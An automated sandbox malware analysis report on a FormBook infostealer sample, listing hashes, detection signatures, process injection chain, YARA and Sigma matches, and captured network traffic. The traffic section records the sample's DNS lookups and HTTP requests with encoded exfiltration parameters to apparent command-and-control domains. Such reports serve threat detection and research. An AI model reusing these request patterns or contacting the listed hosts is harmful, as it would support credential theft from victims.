Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cNDddMAF5u.exe

Overview

General Information

Sample name:cNDddMAF5u.exe
renamed because original name is a hash value
Original sample name:e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64.exe
Analysis ID:1587909
MD5:caf89165d3dfdde3273cce4deade7db4
SHA1:89409de660c21df6b496060e42495a5d9346ed96
SHA256:e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cNDddMAF5u.exe (PID: 3232 cmdline: "C:\Users\user\Desktop\cNDddMAF5u.exe" MD5: CAF89165D3DFDDE3273CCE4DEADE7DB4)
    • svchost.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\cNDddMAF5u.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GVXcOVOPuWmumK.exe (PID: 4500 cmdline: "C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 2628 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • GVXcOVOPuWmumK.exe (PID: 6160 cmdline: "C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1532 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe" , ParentImage: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe, ParentProcessId: 4500, ParentProcessName: GVXcOVOPuWmumK.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 2628, ProcessName: rasdial.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ParentImage: C:\Users\user\Desktop\cNDddMAF5u.exe, ParentProcessId: 3232, ParentProcessName: cNDddMAF5u.exe, ProcessCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ProcessId: 6652, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ParentImage: C:\Users\user\Desktop\cNDddMAF5u.exe, ParentProcessId: 3232, ParentProcessName: cNDddMAF5u.exe, ProcessCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ProcessId: 6652, ProcessName: svchost.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: cNDddMAF5u.exeAvira: detected
                Source: cNDddMAF5u.exeVirustotal: Detection: 65%Perma Link
                Source: cNDddMAF5u.exeReversingLabs: Detection: 81%
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: cNDddMAF5u.exeJoe Sandbox ML: detected
                Source: cNDddMAF5u.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GVXcOVOPuWmumK.exe, 00000005.00000002.2581811705.000000000019E000.00000002.00000001.01000000.00000005.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2581841839.000000000019E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_0070DBBE
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006DC2A2 FindFirstFileExW,1_2_006DC2A2
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007168EE FindFirstFileW,FindClose,1_2_007168EE
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_0071698F
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0070D076
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0070D3A9
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00719642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00719642
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0071979D
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00719B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00719B2B
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00715C97 FindFirstFileW,FindNextFileW,FindClose,1_2_00715C97
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0321C8D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0321C8D0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax6_2_03209EF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h6_2_04FB04DE

                Networking

                barindex
                Source: DNS query: www.egldfi.xyz
                Source: global trafficTCP traffic: 192.168.2.7:54296 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 130.185.109.77 130.185.109.77
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,1_2_0071CE44
                Source: global trafficHTTP traffic detected: GET /vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHy HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.75178.clubUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bcg.servicesUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5ob HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lgdiamonds.infoUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.75178.club
                Source: global trafficDNS traffic detected: DNS query: www.bcg.services
                Source: global trafficDNS traffic detected: DNS query: www.egldfi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.betmatchx.online
                Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.lgdiamonds.info
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: unknownHTTP traffic detected: POST /5onp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 219Host: www.bcg.servicesOrigin: http://www.bcg.servicesReferer: http://www.bcg.services/5onp/User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 4e 51 48 4d 78 4a 2b 66 49 44 34 43 72 6d 51 44 6a 4f 51 70 75 79 4a 4d 59 34 34 6e 52 32 79 4a 55 55 38 46 68 50 72 55 4a 5a 75 38 6e 69 6a 33 67 3d 3d Data Ascii: Ebq4kd=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31NQHMxJ+fID4CrmQDjOQpuyJMY44nR2yJUU8FhPrUJZu8nij3g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:18:55 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:18:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:19:00 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:19:03 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
